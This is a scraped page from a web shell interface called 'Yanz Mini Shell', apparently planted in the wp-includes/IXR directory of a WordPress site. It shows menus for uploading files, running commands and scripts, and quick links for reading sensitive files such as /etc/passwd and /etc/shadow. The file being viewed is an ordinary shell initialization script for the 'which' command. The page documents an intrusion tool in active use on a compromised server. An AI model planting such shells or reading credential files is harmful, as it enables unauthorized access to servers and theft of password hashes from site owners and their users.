Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
hdhubreisen
public_html
wp-includes
IXR
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
# shellcheck shell=sh # Initialization script for bash, sh, mksh and ksh case "$(basename $(readlink /proc/$$/exe))" in *ksh*) which_declare="" which_opt="" ;; zsh) which_declare="typeset -f" which_opt="" ;; bash|sh) which_declare="declare -f" which_opt="-f" ;; *) which_declare="" which_opt="" ;; esac function which { (alias; eval ${which_declare}) | /usr/bin/which --tty-only --read-alias --read-functions --show-tilde --show-dot $@ } export which_declare export ${which_opt} which
Free Space : 62820937728 Byte